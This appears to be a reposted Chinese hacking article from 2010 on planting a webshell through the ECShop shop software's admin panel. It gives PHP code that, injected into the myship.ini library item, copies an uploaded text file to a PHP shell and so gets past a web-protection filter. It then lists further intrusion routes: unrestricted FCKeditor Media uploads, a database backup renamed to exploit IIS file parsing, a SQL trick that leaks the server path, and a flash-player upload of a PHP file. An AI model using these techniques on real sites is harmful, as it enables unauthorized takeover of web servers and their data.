ecshop后台拿shell(另类+总结)
时间:2010-12-25 来源:秩名
其主要功能是通过底层内核驱动过滤技术对Web站点目录提供全方位的防护,防止入侵者或病毒等对目录中的网页、电
子文档、图片、数据库等任何类型的文件进行非法篡改和破坏。
1.网页防挂马
2.防止上传webshell web后门
3.网页防篡改
最强悍的是它过滤了很多asp.php等函数(eval等…)
往myship.ini里面插入时直接过滤了
和4 ever team的兄弟们研究一番..
发现可以上传txt
并且没有过滤任何函数.
于是运用到了php的文件操作…
<script language=”php”>$file = file_get_contents(“C:\Inetpub\wwwroot\ecshop\data/article/1286344719152816497.txt”);
if($file){
$file = “C:\Inetpub\wwwroot\ecshop\data/article/1286344719152816497.txt”;
$newfile = ‘C:\Inetpub\wwwroot\ecshop\data/distant.php’;
copy($file,$newfile);
}</script>
将以上代码插入库项目管理中的myship.ini
打开http://url/myship.php
即在http://url/data/目录下生成distant.php
菜刀连接之…搞定..
最后总结下拿shell方法
1..(发布权限)
http://url/includes/fckeditor/editor/filemanager/connectors/test.html
代码省略
对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell
访问路径为
http://url/images/upload/Media/xxx.php
2.数据库备份…
前台留言..后台备份ec_feedback 为x.asp;.sql (win)
linux俺老不成功..
/**关于爆路径的方法**/
在执行SQL语句的输入框中
输入 use database …
即可爆出物理路径..
3.flash播放器那里可以直接上传x.php..
标签分类: